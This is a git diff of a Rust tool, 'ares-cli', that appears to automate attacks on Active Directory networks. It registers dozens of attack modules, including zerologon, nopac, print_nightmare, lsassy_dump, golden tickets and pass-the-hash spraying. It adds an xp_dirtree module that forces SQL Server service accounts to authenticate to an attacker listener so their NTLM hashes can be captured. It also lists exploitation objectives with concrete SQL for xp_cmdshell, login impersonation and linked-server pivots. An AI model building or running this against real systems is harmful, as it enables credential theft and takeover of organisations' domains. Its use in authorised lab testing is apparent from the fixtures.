item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("machine_account_quota"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "MachineAccountQuota check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup( + &dispatcher.queue, + DEDUP_MACHINE_ACCOUNT_QUOTA, + &item.dedup_key, + ) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "MAQ check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check"); + } + } + } + } +} + +struct MaqWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("maq:{}", "contoso.local"); + assert_eq!(key, "maq:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "machine_account_quota_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MaqWork { + dedup_key: "maq:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "maq:contoso.local"); + } + + // --- collect_maq_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back to first + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("maq:{}", "contoso.local"); + let key2 = format!("maq:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs index bb8cfd3a..5141a35d 100644 --- a/ares-cli/src/orchestrator/automation/mod.rs +++ b/ares-cli/src/orchestrator/automation/mod.rs @@ -13,59 +13,130 @@ //! all threading hacks since tokio tasks are truly concurrent. mod acl; +mod acl_discovery; mod adcs; mod adcs_exploitation; mod bloodhound; +mod certifried; +mod certipy_auth; mod coercion; mod crack; mod credential_access; mod credential_expansion; mod credential_reuse; +mod cross_forest_enum; +mod dacl_abuse; mod delegation; +mod dfs_coercion; +mod dns_enum; +mod domain_user_enum; +mod foreign_group_enum; mod gmsa; +mod golden_cert; mod golden_ticket; mod gpo; +mod gpp_sysvol; +mod group_enumeration; +mod krbrelayup; mod laps; +mod ldap_signing; +mod localuser_spray; +mod lsassy_dump; +mod machine_account_quota; mod mssql; +mod mssql_coercion; mod mssql_exploitation; +mod nopac; +mod ntlm_relay; +mod ntlmv1_downgrade; +mod password_policy; +mod petitpotam_unauth; +mod print_nightmare; +mod pth_spray; mod rbcd; +mod rdp_lateral; mod refresh; mod s4u; +mod searchconnector_coercion; mod secretsdump; mod shadow_credentials; +mod share_coercion; mod share_enum; mod shares; +mod sid_enumeration; +mod smb_signing; +mod smbclient_enum; +mod spooler_check; mod stall_detection; mod trust; mod unconstrained; +mod webdav_detection; +mod winrm_lateral; +mod zerologon; // Re-export all public task functions at the same paths they had before the split. pub use acl::auto_acl_chain_follow; +pub use acl_discovery::auto_acl_discovery; pub use adcs::auto_adcs_enumeration; pub use adcs_exploitation::auto_adcs_exploitation; +pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES; pub use bloodhound::auto_bloodhound; +pub use certifried::auto_certifried; +pub use certipy_auth::auto_certipy_auth; pub use coercion::auto_coercion; pub use crack::auto_crack_dispatch; pub use credential_access::auto_credential_access; pub use credential_expansion::auto_credential_expansion; pub use credential_reuse::auto_credential_reuse; +pub use cross_forest_enum::auto_cross_forest_enum; +pub use dacl_abuse::auto_dacl_abuse; pub use delegation::auto_delegation_enumeration; +pub use dfs_coercion::auto_dfs_coercion; +pub use dns_enum::auto_dns_enum; +pub use domain_user_enum::auto_domain_user_enum; +pub use foreign_group_enum::auto_foreign_group_enum; pub use gmsa::auto_gmsa_extraction; +pub use golden_cert::auto_golden_cert; pub use golden_ticket::auto_golden_ticket; pub use gpo::auto_gpo_abuse; +pub use gpp_sysvol::auto_gpp_sysvol; +pub use group_enumeration::auto_group_enumeration; +pub use krbrelayup::auto_krbrelayup; pub use laps::auto_laps_extraction; +pub use ldap_signing::auto_ldap_signing; +pub use localuser_spray::auto_localuser_spray; +pub use lsassy_dump::auto_lsassy_dump; +pub use machine_account_quota::auto_machine_account_quota; pub use mssql::auto_mssql_detection; +pub use mssql_coercion::auto_mssql_coercion; pub use mssql_exploitation::auto_mssql_exploitation; +pub use nopac::auto_nopac; +pub use ntlm_relay::auto_ntlm_relay; +pub use ntlmv1_downgrade::auto_ntlmv1_downgrade; +pub use password_policy::auto_password_policy; +pub use petitpotam_unauth::auto_petitpotam_unauth; +pub use print_nightmare::auto_print_nightmare; +pub use pth_spray::auto_pth_spray; pub use rbcd::auto_rbcd_exploitation; +pub use rdp_lateral::auto_rdp_lateral; pub use refresh::state_refresh; pub use s4u::auto_s4u_exploitation; +pub use searchconnector_coercion::auto_searchconnector_coercion; pub use secretsdump::auto_local_admin_secretsdump; pub use shadow_credentials::auto_shadow_credentials; +pub use share_coercion::auto_share_coercion; pub use share_enum::auto_share_enumeration; pub use shares::auto_share_spider; +pub use sid_enumeration::auto_sid_enumeration; +pub use smb_signing::auto_smb_signing_detection; +pub use smbclient_enum::auto_smbclient_enum; +pub use spooler_check::auto_spooler_check; pub use stall_detection::auto_stall_detection; pub use trust::auto_trust_follow; pub use unconstrained::auto_unconstrained_exploitation; +pub use webdav_detection::auto_webdav_detection; +pub use winrm_lateral::auto_winrm_lateral; +pub use zerologon::auto_zerologon; pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs new file mode 100644 index 00000000..a9e9fbfa --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs @@ -0,0 +1,698 @@ +//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via +//! xp_dirtree/xp_fileexist. +//! +//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a +//! listener IP, we can force the SQL Server service account to authenticate +//! back to our listener, capturing its NTLMv2 hash for cracking or relay. +//! +//! This is distinct from the general `auto_coercion` module which uses +//! PetitPotam/PrinterBug against DCs. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion. +/// Interval: 45s. +pub async fn auto_mssql_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("mssql_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_mssql_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "mssql_ntlm_coercion", + "target_ip": item.target_ip, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("mssql_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + "MSSQL xp_dirtree NTLM coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "MSSQL coercion task deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion"); + } + } + } + } +} + +/// Collect MSSQL coercion work items from the current state. +/// +/// Extracted from the async loop so it can be unit-tested without a +/// `Dispatcher` or real async runtime scaffolding. +fn collect_mssql_coercion_work( + state: &crate::orchestrator::state::StateInner, + listener: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type.to_lowercase() != "mssql_access" { + continue; + } + + let target_ip = vuln + .details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if target_ip.is_empty() { + continue; + } + + let dedup_key = format!("mssql_coerce:{target_ip}"); + if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) { + continue; + } + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(MssqlCoercionWork { + dedup_key, + target_ip: target_ip.to_string(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +struct MssqlCoercionWork { + dedup_key: String, + target_ip: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("mssql_coerce:{}", "192.168.58.22"); + assert_eq!(key, "mssql_coerce:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion"); + } + + #[test] + fn mssql_access_vuln_type_matching() { + assert_eq!("mssql_access".to_lowercase(), "mssql_access"); + assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access"); + } + + #[test] + fn target_ip_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22"}); + let target = details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or("fallback"); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.10"; + let target = details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.10"); + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(matches); + } + + #[test] + fn credential_domain_empty_no_match() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(!matches); + } + + #[test] + fn mssql_coercion_payload_structure() { + let payload = serde_json::json!({ + "technique": "mssql_ntlm_coercion", + "target_ip": "192.168.58.22", + "listener_ip": "192.168.58.100", + "credential": { + "username": "sa", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "mssql_ntlm_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "sa"); + } + + #[test] + fn domain_extraction_from_vuln() { + let details = serde_json::json!({"domain": "contoso.local"}); + let domain = details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain, "contoso.local"); + + let details2 = serde_json::json!({}); + let domain2 = details2 + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain2, ""); + } + + #[test] + fn mssql_coercion_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "sa".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MssqlCoercionWork { + dedup_key: "mssql_coerce:192.168.58.22".into(), + target_ip: "192.168.58.22".into(), + listener: "192.168.58.100".into(), + credential: cred, + }; + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + } + + // --- collect_mssql_coercion_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + id: &str, + vuln_type: &str, + target: &str, + details: serde_json::Value, + ) -> ares_core::models::VulnerabilityInfo { + let details_map: std::collections::HashMap = + serde_json::from_value(details).unwrap_or_default(); + ares_core::models::VulnerabilityInfo { + vuln_id: id.into(), + vuln_type: vuln_type.into(), + target: target.into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: details_map, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_vulns_with_creds_returns_nothing() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_mssql_access_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22"); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_skips_non_mssql_vulns() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "smb_signing_disabled", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_target_ip_falls_back_to_vuln_target() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "192.168.58.30", json!({})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } + + #[tokio::test] + async fn collect_skips_empty_target_ip() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_prefers_domain_matching_credential() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_no_domain_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_domain_empty() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produce_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 2); + let ips: std::collections::HashSet<&str> = + work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains("192.168.58.22")); + assert!(ips.contains("192.168.58.23")); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "MSSQL_ACCESS", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "CONTOSO.LOCAL")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_partial_dedup_only_skips_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_listener_propagated_to_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[tokio::test] + async fn collect_mixed_vuln_types_only_mssql_access() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "constrained_delegation", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v3".into(), + make_vuln( + "v3", + "mssql_impersonation", + "192.168.58.24", + json!({"target_ip": "192.168.58.24"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[tokio::test] + async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } +} diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs index 8c2ab558..aeaea38b 100644 --- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs @@ -21,7 +21,7 @@ use tracing::{debug, info, warn}; use crate::orchestrator::dispatcher::Dispatcher; /// Dedup key prefix for MSSQL deep exploitation. -const DEDUP_MSSQL_DEEP: &str = "mssql_deep"; +pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep"; /// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation. /// Interval: 30s. @@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation( .to_string(); // Find a credential for MSSQL access. - // Prefer creds for the target domain, fall back to any cred. - let credential = state + // When the target domain is known, prefer a credential from + // that domain (cross-forest NTLM auth otherwise falls through + // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on + // fabrikam.local SQLEXPRESS). + // + // For `mssql_linked_server` vulns, fall back to a trusted-domain + // credential when no same-domain cred exists: the link hop + // executes via stored login mapping on the remote side, so + // any cred that authenticates to the source server is fine + // (e.g., a child cred lands on sql-link01, then EXEC AT + // [SQL01] runs as fabrikam\sql_svc via the stored mapping). + let same_domain = state .credentials .iter() .find(|c| { @@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation( && (domain.is_empty() || c.domain.to_lowercase() == domain.to_lowercase()) }) - .or_else(|| { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - }) .cloned(); + let credential = same_domain.or_else(|| { + if domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + } else { + state.find_trust_credential(&domain) + } + }); if credential.is_none() { debug!( @@ -142,9 +160,17 @@ pub async fn auto_mssql_exploitation( "objectives": [ "Enable xp_cmdshell and execute whoami to confirm code execution", "Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin", + "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'", + "For each impersonatable login, try EXECUTE AS LOGIN = '' and check IS_SRVROLEMEMBER('sysadmin')", + "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'", + "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation", + "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1", "Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)", "Check for SeImpersonatePrivilege for potato escalation", - "Enumerate linked servers for lateral movement", + "Enumerate linked servers and test RPC execution on each link", + "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1", + "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, 